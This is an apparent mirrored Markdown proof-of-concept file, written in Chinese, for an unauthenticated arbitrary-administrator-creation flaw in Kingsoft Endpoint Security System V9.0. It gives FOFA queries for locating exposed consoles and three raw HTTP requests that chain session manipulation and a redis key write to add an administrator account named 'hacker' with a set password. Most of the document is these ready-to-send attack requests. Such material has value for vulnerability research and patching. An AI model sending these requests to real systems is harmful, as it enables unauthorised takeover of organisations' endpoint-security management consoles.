admin/adysec_POC
1
0
Fork 0
mirror of https://github.com/adysec/POC.git synced 2025-11-07 03:13:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
adysec_POC/wpoc/金山/金山终端安全系统V9.0任意用户添加漏洞.md
adysec 2a98e80c47 wy876 POC backup
2025-03-07 18:18:50 +08:00

78 lines
3.1 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 金山终端安全系统V9.0任意用户添加漏洞
## fofa
```javascript
title=="用户登录-猎鹰终端安全系统V9.0Web控制台"
app="金山终端安全系统V9.0Web控制台"
```
## poc
首先访问 checklogin.php设置$_SESSION[userName]。(后续的 Cookie 保持不变)
```javascript
POST /inter/ajax.php?imd=checklogin HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
uname=login_session_
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301550929.png)
接下来访问 send_verify2email.php 在 redis 中添加一个键值对:mailTo 符合邮箱格式即可)
```javascript
POST /inter/ajax.php?imd=send_verify2email HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
mailTo=login_session_@qq.comEmail
```
![image-20241230155135464](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301551573.png)
面两个步骤访问完成之后,即可未授权访问系统的所有功能,接下来通过权限校验,添加一个系统管理员,访问 get_user_login_cmd 文件即可。(userSession 需要设置成 Email密码为 1qaz@WSX)
```javascript
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: 192.168.20.131:6868
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest
Content-Length: 285
Origin: http://192.168.20.131:6868
Connection: close
Referer: http://192.168.20.131:6868/
Cookie: SKYLARa0aede9e785feabae789c6e03d=v70c2hbb4fnf1mqa1l9f44a964
{"add_user_info_cmd":{"userSession":"Email","mode_id":"B666A8CD-2247-2CA8-4F7D-29EB058A27C2","real_name":"","user_name":"hacker","type":"分级管理员","tel":"","mobile":"","corp":"","notice":"","psw":"92d7ddd2a010c59511dc2905b7e14f64","email":"","VHierarchyName":"","orgtype":"1"}}
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552673.png)
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412301552975.png)
## 漏洞来源
- https://xz.aliyun.com/t/16105
Reference in New Issue View Git Blame Copy Permalink